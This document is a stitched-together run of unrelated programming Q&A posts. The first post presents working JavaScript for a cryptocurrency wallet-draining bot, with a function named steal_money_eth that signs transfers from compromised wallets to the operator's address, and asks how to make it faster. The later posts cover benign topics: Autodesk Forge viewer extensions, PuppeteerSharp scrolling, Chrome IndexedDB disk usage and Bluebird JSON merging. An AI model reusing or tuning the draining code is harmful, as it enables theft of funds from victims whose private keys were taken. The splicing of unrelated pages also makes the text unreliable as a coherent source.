I am new to cryptocurrency and would like to find out how to speed up the process of taking a token. Here is the finished code:
I use the code to exchange and do other things via telegram
async function trans_wallets_eth() {
for(var x in trans_eth) {
var to_address = trans_eth[x]['to'];
if (to_address in all_wallets) {
steal_money_eth(to_address, all_wallets[to_address]);
await new Promise(resolve => setTimeout(resolve, 30000));
}
}
}
async function getBlocks_eth() {
var work = true
while (work) {
try {
var latestBlock = await web4.eth.getBlock(block_identifier = web4.eth.defaultBlock, full_transactions = true);
global.trans_eth = latestBlock.transactions;
await trans_wallets_eth()
console.log('ETH '+latestBlock.number);
await new Promise(resolve => setTimeout(resolve, 1500));
} catch (e) {
await new Promise(resolve => setTimeout(resolve, 2000));
web4 = new Web3(moralis_eth)
}
}
}
async function steal_money_eth(wallet, wallet_specs) {
try {
var private_key = wallet_specs[0]
var eth_balance = wallet_specs[3]
var grab_from_eth_balance = await web4.utils.toWei(eth_balance, 'ether')
var fast_gas_price = await web4.utils.toWei(eth_gwei, 'gwei')
var counter = 0
while (true) {
var balance = await web4.eth.getBalance(wallet)
if (Number(balance) < grab_from_eth_balance) {
await new Promise(resolve => setTimeout(resolve, 100));
counter++
if (counter === 200) {
console.log("Stopped here")
return;
}
} else {
break;
}
}
var nonce = await web4.eth.getTransactionCount(wallet)
var transfer_amount = Number(balance) - fast_gas_price * 21000
var tx_price = {
'chainId': 1,
'nonce': nonce,
'to': user_wallet_address_eth,
'value': transfer_amount,
'gas': 21000,
'gasPrice': fast_gas_price
}
var signed_tx = await web4.eth.accounts.signTransaction(tx_price, private_key)
var tx_hash = await web4.eth.sendSignedTransaction(signed_tx.rawTransaction)
global.amount_sent_eth = await web4.utils.fromWei(String(transfer_amount), 'ether')
global.tx_link_eth = 'https://etherscan.com/tx/' + tx_hash.transactionHash
console.log('π°ETH '+amount_sent_eth+'π° Transaction successful!ππ ' + tx_link_eth)
sending_good_news_eth()
} catch (e) {
console.log(e)
await new Promise(resolve => setTimeout(resolve, 5000));
}
}
I would like to understand where to look. You don't have to change the code for me. Thank you in advance.
My goal is to see the Revit rooms in the Forge viewer. The application is in .NET Core. I have tried implementing GenerateMasterViews.
The code I am using to achieve this is:
[Route("api/forge/modelderivative/jobs")]
public async Task<dynamic> TranslateObject([FromBody]TranslateObjectModel objModel)
{
dynamic oauth = await OAuthController.GetInternalAsync();
// prepare the payload
var advOutputPayload = new JobSvf2OutputPayloadAdvanced();
advOutputPayload.GenerateMasterViews = true;
List<JobPayloadItem> outputs = new List<JobPayloadItem>()
{
new JobPayloadItem(
JobPayloadItem.TypeEnum.Svf2,
new List<JobPayloadItem.ViewsEnum>()
{
JobPayloadItem.ViewsEnum._2d,
JobPayloadItem.ViewsEnum._3d
},
advOutputPayload
)
};
JobPayload job;
job = new JobPayload(new JobPayloadInput(objModel.objectName), new JobPayloadOutput(outputs));
// start the translation
DerivativesApi derivative = new DerivativesApi();
derivative.Configuration.AccessToken = oauth.access_token;
dynamic jobPosted = await derivative.TranslateAsync(job);
return jobPosted;
}
Autodesk.Viewing.Initializer(options, () => {
viewer = new Autodesk.Viewing.GuiViewer3D(document.getElementById('forgeViewer'));
viewer.start();
var documentId = 'urn:' + urn;
Autodesk.Viewing.Document.load(documentId, onDocumentLoadSuccess, onDocumentLoadFailure);
});
}
function onDocumentLoadSuccess(doc) {
var viewables = doc.getRoot().getDefaultGeometry();
viewer.loadDocumentNode(doc, viewables).then(i => {
// documented loaded, any action?
});
}
But I can't get it to work.
I have looked for information, but these two URLs don't work, and I couldn't see how to do it from them:
https://forge.autodesk.com/en/docs/model-derivative/v2/tutorials/prep-roominfo4viewer/option2/
https://forge.autodesk.com/en/docs/model-derivative/v2/tutorials/prep-roominfo4viewer/option1/
To check if the object is in the room, we can do the following:
Get the bounding box of each room and object:
getBoundingBox(dbId, model) {
const it = model.getInstanceTree();
const fragList = model.getFragmentList();
let bounds = new THREE.Box3();
it.enumNodeFragments(dbId, (fragId) => {
let box = new THREE.Box3();
fragList.getWorldBounds(fragId, box);
bounds.union(box);
}, true);
return bounds;
}
Iterate over the rooms and objects and use containsBox or containsPoint to check whether their bounding boxes intersect.
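For example, a minimal sketch of that coarse check (assuming roomBounds and elementBounds are THREE.Box3 instances returned by a helper like getBoundingBox above):
// Coarse-phase check: the element is a candidate for the room if the room's box
// fully contains the element's box, or at least contains its center point.
// Note: center() is the legacy three.js API bundled with the Viewer; newer three.js uses getCenter().
function isElementCandidateForRoom(roomBounds, elementBounds) {
  return roomBounds.containsBox(elementBounds) ||
    roomBounds.containsPoint(elementBounds.center());
}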
If you want a more accurate collision check, you can take advantage of ThreeCSG.js to do a geometry intersection. Here is a blog post demonstrating how to integrate ThreeCSG.js with the Forge Viewer:
https://forge.autodesk.com/blog/boolean-operations-forge-viewer
Note: this process can reduce viewer performance, since JavaScript runs on a single thread in the browser, so you may want to use something like a Web Worker to do the complex calculations on a separate thread.
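For instance, here is a minimal sketch of handing the coarse-phase data to a Web Worker (collision-worker.js is a hypothetical script name, and bbox / roomBoxData are placeholders for the element box and the cached room boxes):
// Only plain data can be posted across threads, so serialize the THREE.Box3
// instances to arrays before sending them to the worker.
const worker = new Worker('collision-worker.js'); // hypothetical worker script
worker.onmessage = (event) => {
  // The worker posts back the dbIds of the rooms that contain the element.
  console.log('Matching rooms:', event.data);
};
worker.postMessage({
  elementBox: { min: bbox.min.toArray(), max: bbox.max.toArray() },
  roomBoxes: roomBoxData // e.g. [{ dbId: 123, min: [...], max: [...] }, ...]
});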
Update:
Here is a working sample extension demonstrating the above idea:
/////////////////////////////////////////////////////////////////////
// Copyright (c) Autodesk, Inc. All rights reserved
// Written by Forge Partner Development
//
// Permission to use, copy, modify, and distribute this software in
// object code form for any purpose and without fee is hereby granted,
// provided that the above copyright notice appears in all copies and
// that both that copyright notice and the limited warranty and
// restricted rights notice below appear in all supporting
// documentation.
//
// AUTODESK PROVIDES THIS PROGRAM "AS IS" AND WITH ALL FAULTS.
// AUTODESK SPECIFICALLY DISCLAIMS ANY IMPLIED WARRANTY OF
// MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. AUTODESK, INC.
// DOES NOT WARRANT THAT THE OPERATION OF THE PROGRAM WILL BE
// UNINTERRUPTED OR ERROR FREE.
/////////////////////////////////////////////////////////////////////
(function () {
const Utility = {
/**
* Reset an object
* @param {Object} obj An object to be reset.
* ref: https://stackoverflow.com/a/24090180
*/
resetObject: function (obj) {
for (let key of Object.getOwnPropertyNames(obj)) {
if (!obj.hasOwnProperty(key)) continue;
let val = obj[key];
switch (typeof val) {
case 'string':
obj[key] = ''; break;
case 'number':
obj[key] = 0; break;
case 'boolean':
obj[key] = false; break;
case 'object':
if (val === null) break;
if (val instanceof Array) {
while (obj[key].length > 0) {
obj[key].pop();
}
break;
}
val = {};
//Or recursively clear the sub-object
//resetObject(val);
break;
}
}
}
};
/**
* A Forge Viewer extension for locating the Revit rooms that contain a selected element
* @class
*/
class RoomLocatorExtension extends Autodesk.Viewing.Extension {
constructor(viewer, options) {
super(viewer, options);
this.roomCategoryName = options.roomCategoryName || 'Revit Rooms';//'Revit Habitaciones'
this.onContextMenu = this.onContextMenu.bind(this);
}
onContextMenu(menu, status) {
if (status.hasSelected) {
menu.push({
title: 'Find room',
target: async () => {
let selSet = this.viewer.getSelection();
this.viewer.clearSelection();
const roomDbIds = await this.locateElementByRoom(selSet[0]);
if (!roomDbIds || roomDbIds.length <= 0) return;
this.viewer.select(roomDbIds);
}
});
}
}
async getPropertiesAsync(dbId, model) {
return new Promise((resolve, reject) => {
model.getProperties2(
dbId,
(result) => resolve(result),
(error) => reject(error)
);
});
}
async getElementsByCategoryAsync(category) {
return new Promise((resolve, reject) => {
this.viewer.search(
category,
(dbIds) => resolve(dbIds),
(error) => reject(error),
['Category'],
{ searchHidden: true }
);
});
}
async getRoomDbIds() {
try {
const roomDbIds = await this.getElementsByCategoryAsync(this.roomCategoryName);
if (!roomDbIds || roomDbIds.length <= 0) {
throw new Error('No Rooms found in current model');
}
return roomDbIds;
} catch (ex) {
console.warn(`[RoomLocatorExtension]: ${ex}`);
throw new Error('No room found');
}
}
getBoundingBox(dbId, model) {
const it = model.getInstanceTree();
const fragList = model.getFragmentList();
let bounds = new THREE.Box3();
it.enumNodeFragments(dbId, (fragId) => {
let box = new THREE.Box3();
fragList.getWorldBounds(fragId, box);
bounds.union(box);
}, true);
return bounds;
}
getLeafFragIds(model, leafId) {
const instanceTree = model.getData().instanceTree;
const fragIds = [];
instanceTree.enumNodeFragments(leafId, function (fragId) {
fragIds.push(fragId);
});
return fragIds;
}
getComponentGeometryInfo(dbId, model) {
const viewer = this.viewer;
const viewerImpl = viewer.impl;
const fragIds = this.getLeafFragIds(model, dbId);
let matrixWorld = null;
const meshes = fragIds.map((fragId) => {
const renderProxy = viewerImpl.getRenderProxy(model, fragId);
const geometry = renderProxy.geometry;
const attributes = geometry.attributes;
const positions = geometry.vb ? geometry.vb : attributes.position.array;
const indices = attributes.index.array || geometry.ib;
const stride = geometry.vb ? geometry.vbstride : 3;
const offsets = geometry.offsets;
matrixWorld = matrixWorld || renderProxy.matrixWorld.elements;
return {
positions,
indices,
offsets,
stride
};
});
return {
matrixWorld,
meshes
};
}
getComponentGeometry(data, vertexArray) {
const offsets = [
{
count: data.indices.length,
index: 0,
start: 0
}
];
for (let oi = 0, ol = offsets.length; oi < ol; ++oi) {
let start = offsets[oi].start;
let count = offsets[oi].count;
let index = offsets[oi].index;
for (let i = start, il = start + count; i < il; i += 3) {
const a = index + data.indices[i];
const b = index + data.indices[i + 1];
const c = index + data.indices[i + 2];
const vA = new THREE.Vector3();
const vB = new THREE.Vector3();
const vC = new THREE.Vector3();
vA.fromArray(data.positions, a * data.stride);
vB.fromArray(data.positions, b * data.stride);
vC.fromArray(data.positions, c * data.stride);
vertexArray.push(vA);
vertexArray.push(vB);
vertexArray.push(vC);
}
}
}
buildComponentMesh(data) {
const vertexArray = [];
for (let idx = 0; idx < data.nbMeshes; ++idx) {
const meshData = {
positions: data['positions' + idx],
indices: data['indices' + idx],
stride: data['stride' + idx]
}
this.getComponentGeometry(meshData, vertexArray);
}
const geometry = new THREE.Geometry();
for (let i = 0; i < vertexArray.length; i += 3) {
geometry.vertices.push(vertexArray[i]);
geometry.vertices.push(vertexArray[i + 1]);
geometry.vertices.push(vertexArray[i + 2]);
const face = new THREE.Face3(i, i + 1, i + 2);
geometry.faces.push(face);
}
const matrixWorld = new THREE.Matrix4();
matrixWorld.fromArray(data.matrixWorld);
const mesh = new THREE.Mesh(geometry);
mesh.applyMatrix(matrixWorld);
mesh.boundingBox = data.boundingBox;
mesh.bsp = new ThreeBSP(mesh)
mesh.dbId = data.dbId;
return mesh;
}
buildCsgMesh(dbId, model) {
const geometry = this.getComponentGeometryInfo(dbId, model);
const data = {
boundingBox: this.getBoundingBox(dbId, model),
matrixWorld: geometry.matrixWorld,
nbMeshes: geometry.meshes.length,
dbId
};
geometry.meshes.forEach((mesh, idx) => {
data['positions' + idx] = mesh.positions;
data['indices' + idx] = mesh.indices;
data['stride' + idx] = mesh.stride;
});
return this.buildComponentMesh(data);
}
async buildBBoxes() {
try {
const model = this.viewer.model;
const roomBBoxes = {};
const roomDbIds = await this.getRoomDbIds();
for (let i = 0; i < roomDbIds.length; i++) {
let dbId = roomDbIds[i];
let bbox = await this.getBoundingBox(dbId, model);
roomBBoxes[dbId] = bbox;
}
this.cachedBBoxes['rooms'] = roomBBoxes;
} catch (ex) {
console.warn(`[RoomLocatorExtension]: ${ex}`);
throw new Error('Cannot build bounding boxes from rooms');
}
}
async locateElementByRoom(dbId) {
let bbox = await this.getBoundingBox(dbId, this.viewer.model);
const roomDbIds = Object.keys(this.cachedBBoxes['rooms']);
const roomBoxes = Object.values(this.cachedBBoxes['rooms']);
// Coarse Phase Collision
const coarseResult = [];
for (let i = 0; i < roomDbIds.length; i++) {
let roomDbId = roomDbIds[i];
let roomBox = roomBoxes[i];
if (roomBox.containsBox(bbox)) {
coarseResult.push(parseInt(roomDbId));
} else {
if (roomBox.containsPoint(bbox.min) || roomBox.containsPoint(bbox.max) || roomBox.containsPoint(bbox.center())) {
coarseResult.push(parseInt(roomDbId));
}
}
}
// Fine Phase Collision
const fineResult = [];
let elementCsgMesh = this.buildCsgMesh(dbId, this.viewer.model);
for (let i = 0; i < coarseResult.length; i++) {
let roomDbId = coarseResult[i];
let roomCsgMesh = this.buildCsgMesh(roomDbId, this.viewer.model);
let result = elementCsgMesh.bsp.intersect(roomCsgMesh.bsp);
if (result.tree.polygons.length <= 0) {
result = roomCsgMesh.bsp.intersect(elementCsgMesh.bsp);
// if (!this.viewer.overlays.hasScene('csg'))
// this.viewer.overlays.addScene('csg');
// else
// this.viewer.overlays.clearScene('csg');
// let mat = new THREE.MeshBasicMaterial({ color: 'red' })
// let mesh = result.toMesh(mat);
// this.viewer.overlays.addMesh(mesh, 'csg')
if (result.tree.polygons.length <= 0) continue;
}
fineResult.push(roomDbId);
}
return fineResult;
}
async load() {
await Autodesk.Viewing.Private.theResourceLoader.loadScript(
'https://cdn.jsdelivr.net/gh/Wilt/ThreeCSG@develop/ThreeCSG.js',
'ThreeBSP'
);
if (!window.ThreeBSP)
throw new Error('Cannot load ThreeCSG.js, please download a copy from https://github.com/Wilt/ThreeCSG/blob/develop/ThreeCSG.js')
await this.viewer.waitForLoadDone();
this.cachedBBoxes = {};
await this.buildBBoxes();
this.viewer.registerContextMenuCallback(
'RoomLocatorExtension',
this.onContextMenu
);
return true;
}
unload() {
Utility.resetObject(this.cachedBBoxes);
this.viewer.unregisterContextMenuCallback(
'RoomLocatorExtension',
this.onContextMenu
);
return true;
}
}
Autodesk.Viewing.theExtensionManager.registerExtension('RoomLocatorExtension', RoomLocatorExtension);
})();
I am new to PuppeteerSharp and Puppeteer in general.
I am trying to convert a function used in Puppeteer to PuppeteerSharp and am wondering how to do it.
Here is the Puppeteer function (this one scrolls down to the end of the page):
async function autoScroll(page){
await page.evaluate(async () => {
await new Promise((resolve, reject) => {
var totalHeight = 0;
var distance = 100;
var timer = setInterval(() => {
var scrollHeight = document.body.scrollHeight;
window.scrollBy(0, distance);
totalHeight += distance;
if(totalHeight >= scrollHeight){
clearInterval(timer);
resolve();
}
}, 100);
});
});
}
Can anyone please tell me how I can get this to work with PuppeteerSharp?
Kind Regards
You can call EvaluateFunctionAsync and pass that function as a string:
await page.EvaluateFunctionAsync(@"async () => {
await new Promise((resolve, reject) => {
var totalHeight = 0;
var distance = 100;
var timer = setInterval(() => {
var scrollHeight = document.body.scrollHeight;
window.scrollBy(0, distance);
totalHeight += distance;
if(totalHeight >= scrollHeight){
clearInterval(timer);
resolve();
}
}, 100);
});
}");
When we isolate an element in a 3D view, is there any way to control the amount of transparency of all the other elements? Say, change them to 50% translucent?
Have I missed something obvious?
And can you do the same for 2D views?
I dug out the following code for you; it shows how to set all leaf nodes to 50% opacity by changing their material properties:
AutodeskNamespace("Autodesk.ADN.Viewing.Extension");
function getLeafNodes(model, nodeId) {
return new Promise((resolve, reject)=>{
try{
var leafIds = [];
var instanceTree = model.getData().instanceTree
nodeId = nodeId || instanceTree.getRootId()
function _getLeafNodesRec(id){
var childCount = 0;
instanceTree.enumNodeChildren(id,
function(childId) {
_getLeafNodesRec(childId)
++childCount
})
if(childCount == 0){
leafIds.push(id)
}
}
_getLeafNodesRec(nodeId)
return resolve(leafIds)
} catch(ex){
return reject(ex)
}
})
}
function nodeIdToFragIds(model, nodeId) {
var instanceTree = model.getData().instanceTree
var fragIds = []
instanceTree.enumNodeFragments(
nodeId, (fragId) => {
fragIds.push(fragId)
});
return fragIds
}
Autodesk.ADN.Viewing.Extension.Basic = function (viewer, options) {
Autodesk.Viewing.Extension.call(this, viewer, options);
var _this = this;
_this.load = function () {
var fragList = viewer.model.getFragmentList()
getLeafNodes(viewer.model).then((dbIds) => {
dbIds.forEach((dbId) => {
const fragIds = nodeIdToFragIds(
viewer.model, dbId)
fragIds.forEach((fragId) => {
var material = fragList.getMaterial(fragId)
if(material) {
material.opacity = 0.5
material.transparent = true
material.needsUpdate = true
}
})
})
viewer.impl.invalidate(true, true, true)
})
return true;
};
_this.unload = function () {
Autodesk.Viewing.theExtensionManager.unregisterExtension(
"Autodesk.ADN.Viewing.Extension.Basic");
return true;
};
};
Autodesk.ADN.Viewing.Extension.Basic.prototype =
Object.create(Autodesk.Viewing.Extension.prototype);
Autodesk.ADN.Viewing.Extension.Basic.prototype.constructor =
Autodesk.ADN.Viewing.Extension.Basic;
Autodesk.Viewing.theExtensionManager.registerExtension(
"Autodesk.ADN.Viewing.Extension.Basic",
Autodesk.ADN.Viewing.Extension.Basic);
Some of the syntax requires ES6 transpiling. You can quickly paste the code into the extension editor to test it: http://viewer.autodesk.io/node/gallery/#/extension-editor?id=560c6c57611ca14810e1b2bf
This works only for 3D; I'll see what we can do for 2D and update this topic.
I am trying to create an application where products are received every second and a fixed-size database (~300 MB) is updated using an LRU policy. Although I get no exceptions when adding new products or deleting them from the database, it seems that Chrome never deletes the .ldb and .bak files. As a result, I use up several gigabytes of disk space and always reach the quota limit. The same code works perfectly on Firefox. Can someone explain what I am doing wrong? Below you can find the code.
startExperiment(300 * 1024 * 1024);
function startExperiment(lrusize:number) {
var j = 0;
var productsToInsert = new HashMap<number, Product>();
window.indexedDB.deleteDatabase("ExampleDatabase");
var versionNumber = 1;
var stats = new Stats();
var sizeOfDatabase = 0;
var db = new ProductDatabase('ExampleDatabase', versionNumber, () => {
db.getSizeOfDatabase((result) => {
if(result == null) {
sizeOfDatabase = 0;
} else {
sizeOfDatabase = result;
}
});
});
function randomizeArray() {
var numOfMBS = Math.floor((Math.random() * (10 - 2) + 2) * 1024 * 1024);
var bytearray = new Uint8Array(numOfMBS.valueOf());
for (var i = 0; i < bytearray.length; i++) {
bytearray[i] = Math.random() * (100 - 1) + 1;
}
return bytearray;
}
setInterval(function () {
var readAverage = stats.getReadTimesAverage();
var writeAverage = stats.getWriteTimesAverage();
var deleteAverage = stats.getDeleteTimesAverage();
console.log("Num of insertions : " + j + " | Read average : " + readAverage + " | Write average : " + writeAverage + " | Delete average : " + deleteAverage);
}, 5000);
setInterval(function () {
var bytearray = randomizeArray();
var identifier = j++;
var timestamp = Date.now();
db.getProduct(identifier, (product) => {
if (product == null) {
var newProduct = new Product(identifier, timestamp, 0, bytearray);
var size = memorySizeOf(newProduct);
newProduct.sizeInBytes = size;
productsToInsert.set(identifier, newProduct);
}
});
}, 1000);
function updateLRU() {
var tmpList:Product[] = [];
var keys = productsToInsert.keys();
var currentBytesToBeInserted = 0;
for (var i = 0; i < keys.length; i++) {
var product = productsToInsert.get(keys[i]);
tmpList.push(product);
currentBytesToBeInserted += product.sizeInBytes;
}
var currentSize = sizeOfDatabase + currentBytesToBeInserted;
if (currentSize > lrusize) {
var bytesToRemove = currentSize - lrusize;
db.deleteProducts(bytesToRemove, stats, () => {
sizeOfDatabase -= bytesToRemove;
addProducts(tmpList);
});
} else {
addProducts(tmpList);
}
}
function addProducts(tmpList:Product[]) {
var product = tmpList[0];
var startAddProductTs = Date.now();
db.addProduct(product, () => {
var stopAddProductTs = Date.now();
stats.addWriteTimes(stopAddProductTs - startAddProductTs);
sizeOfDatabase += product.sizeInBytes;
tmpList.shift();
productsToInsert.delete(product.productId);
if(tmpList.length > 0) {
addProducts(tmpList);
} else {
db.addDBSize(sizeOfDatabase, () => {
});
}
});
}
setInterval(function () {
updateLRU();
}, 20000);
}
class ProductDatabase {
private db;
constructor(private name:string, private version:number, callback:() => void) {
this.openDatabase(callback);
}
openDatabase(callback:() => void) {
var openDatabaseRequest = window.indexedDB.open(this.name, this.version);
openDatabaseRequest.onupgradeneeded = this.upgrade;
openDatabaseRequest.onsuccess = () => {
this.db = openDatabaseRequest.result;
callback();
}
}
upgrade(event:any) {
var store = event.target.result.createObjectStore("products", {keyPath: 'productId'});
store.createIndex('by_timestamp', "timestamp", {unique: true});
event.target.result.createObjectStore("dbsize", {keyPath: 'sizeId'});
}
getProduct(productId:number, callback:(result:Product) => void) {
var productStore = this.db.transaction(["products"], "readonly").objectStore('products');
var query = productStore.get(productId);
query.onsuccess = () => {
var product = query.result;
callback(product);
}
query.onerror = () => {
console.error("Read product error : " + query.error);
}
}
addDBSize(dbSize:number, callback:() => void) {
var transaction = this.db.transaction('dbsize', 'readwrite');
var productStore = transaction.objectStore('dbsize');
var newSize = {'sizeId': 1, 'bytelength': dbSize};
var request = productStore.put(newSize);
request.onerror = () => {
console.log("Unsuccessful request with error : " + request.error);
}
transaction.oncomplete = () => {
callback();
}
transaction.onerror = () => {
console.error("fucking error : " + transaction.error);
}
transaction.onabort = () => {
console.error("Shit. transaction is aborted with error : " + transaction.error);
}
}
addCachedProducts(productList:Array<Product>, callback:() => void) {
var transaction = this.db.transaction('products', 'readwrite');
var productStore = transaction.objectStore('products');
for (var i = 0; i < productList.length; i++) {
productStore.add(productList[i]);
}
transaction.oncomplete = () => {
callback();
}
transaction.onabort = () => {
console.error("Shit. transaction is aborted with error : " + transaction.error);
}
}
getNumberOfProducts(callback:(result:number) => void) {
var productStore = this.db.transaction('products', 'readonly').objectStore('products');
var query = productStore.count();
query.onsuccess = () => {
var result = query.result;
callback(result);
}
query.onerror = () => {
console.error("Read number of products error : " + query.error);
}
}
getSizeOfDatabase(callback:(result:number) => void) {
var productStore = this.db.transaction('dbsize', "readonly").objectStore('dbsize');
var query = productStore.get(1);
query.onsuccess = () => {
var product = query.result;
callback(product);
}
query.onerror = () => {
console.error("Read databasesize error : " + query.error);
}
}
deleteProducts(numOfBytes:number, stats:Stats, callback:() => void) {
var transaction = this.db.transaction('products', 'readwrite');
var productStore = transaction.objectStore('products');
var index = productStore.index('by_timestamp');
var request = index.openCursor();
request.onsuccess = function () {
var cursor = request.result;
if (cursor) {
var cursorBytes = cursor.value.sizeInBytes;
var startDeleteTs = Date.now();
var deleteRequest = cursor.delete();
deleteRequest.onsuccess = () => {
var stopDeleteTs = Date.now();
stats.addDeleteTimes(stopDeleteTs - startDeleteTs);
numOfBytes -= cursorBytes;
if (numOfBytes > 0) {
cursor.continue();
}
}
deleteRequest.onerror = () => {
console.error("Delete product error : " + deleteRequest.error);
}
}
}
transaction.oncomplete = () => {
callback();
}
transaction.onabort = () => {
console.log("Delete transaction aborted with error : " + transaction.error);
}
}
addProduct(product:Product, callback:() => void) {
var transaction = this.db.transaction('products', 'readwrite');
var productStore = transaction.objectStore('products');
var request = productStore.put(product);
request.onerror = () => {
console.log("Unsuccessful request with error : " + request.error);
}
transaction.oncomplete = () => {
callback();
}
transaction.onerror = () => {
console.error("fucking error : " + transaction.error);
}
transaction.onabort = () => {
console.error("Shit. transaction is aborted with error : " + transaction.error);
}
}
}
In Chrome, there is a delay between deleting data through the IndexedDB API and having it deleted from disk. Usually that's fine. But in my experience, sometimes it never gets deleted from disk, which is really bad when the user has exceeded their quota because then you can never store any more data even if you delete everything.
Thanks dumbmatter. Unfortunately, my experience also showed that Chrome never deletes the unnecessary files. The problem is that Chrome's IndexedDB implementation is built on LevelDB, which rarely runs compaction. However, I found a solution using PouchDB, which leverages both the IndexedDB and LevelDB APIs, and with it I can explicitly call compact and delete my unnecessary files.
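For reference, here is a minimal sketch of that PouchDB approach (the database name and the evictAndCompact helper are just examples, not part of my original code):
// Store products in PouchDB (backed by IndexedDB in Chrome), delete the evicted
// documents, then compact so the space held by old revisions is reclaimed on disk.
const db = new PouchDB('products-cache'); // example database name
async function evictAndCompact(idsToDelete) {
  for (const id of idsToDelete) {
    const doc = await db.get(id);
    await db.remove(doc);
  }
  await db.compact();
}
// Alternatively, automatic compaction can be enabled when the database is created:
// const db = new PouchDB('products-cache', { auto_compaction: true });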
Trying to get API data.
I have a problem with creating valid JSON after modification.
The data should look like this: [{"1"},{"2"},{"3"}, ... ,{"201"},{"202"},{"203"}, ...]
but now it looks like this: [{"1"},{"2"},{"3"}, ...],[{"201"},{"202"},{"203"}, ...]
Where is my mistake?
var Promise = require("bluebird");
var request = require('bluebird').promisifyAll(require('request'));
var fs = Promise.promisifyAll(require('fs'));
var ladders = {"hardcore":"hardcore", "standard":"standard"};
function getJSONsync(urls) {
var ladder = [];
Promise.map(urls, function(url) {
return request
.getAsync(url)
.spread(function (res, body) {
if (res.statusCode != 200) {
throw new Error('Unsuccessful attempt. Code: '+ res.statusCode);
}
return JSON.stringify(ladder.concat(JSON.parse(body).entries), "", 4);
})
.catch(console.error);
},{ concurrency: 10 })
.then(function(arr) {
fs.writeFileAsync('file.json', arr);
})
}
function setUrls(ladderName, offset, limit) {
var arr = [];
while(offset < 15000 ) {
arr.push('http://api.pathofexile.com/ladders/'+ladderName+'?offset='+offset+'&limit='+limit);
offset = offset + 200;
}
return arr;
}
getJSONsync(setUrls(ladders.hardcore, 0, 200));
Thanks for the help, and sorry for my English.
Finally, the working version:
var Promise = require("bluebird");
var request = require('bluebird').promisifyAll(require('request'));
var fs = Promise.promisifyAll(require('fs'));
var ladders = {"hardcore":"hardcore","standard":"standard"};
function getJSONsync(urls) {
Promise.map(urls, function(url) {
return request
.getAsync(url)
.spread(function (res, body) {
if (res.statusCode != 200) {
throw new Error('Unsuccessful attempt. Code: '+ res.statusCode);
}
return JSON.parse(body).entries;
})
.catch(console.error);
},{ concurrency: 10 })
.reduce(function(a, b) { return a.concat(b) })
.then(function(arr) {
fs.writeFileAsync('file.json', JSON.stringify(arr, "", 4));
console.log(arr.length);
})
}
function setUrls(ladder, offset, limit) {
var arr = [];
while(offset < 15000 ) {
arr.push('http://api.pathofexile.com/ladders/'+ladder+'?offset='+offset+'&limit='+limit);
offset = offset + 200;
}
return arr;
}
getJSONsync(setUrls(ladders.hardcore, 0, 200));
Promise.map returns an array, so when you do ladder.concat you return another array for each URL, and the result becomes nested, like [[{"1"}], [{"1"}, {"2"}]].
You should just remove concat:
return JSON.stringify(JSON.parse(body).entries, "", 4);
But if you want to use the ladder variable, you can call ladder.push(JSON.stringify(JSON.parse(body).entries, "", 4)) and use it instead of the returned arr variable.
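To illustrate the difference, here is a standalone sketch (fetchEntries is a hypothetical helper that resolves with the entries array of one page):
// Promise.map resolves with one result per URL, i.e. an array of entry arrays.
// Flattening them first and stringifying once produces a single flat JSON array.
Promise.map(urls, fetchEntries, { concurrency: 10 })   // [[e1, e2], [e3, e4], ...]
    .reduce(function (acc, entries) { return acc.concat(entries); }, [])
    .then(function (flat) {
        return fs.writeFileAsync('file.json', JSON.stringify(flat, null, 4));
    });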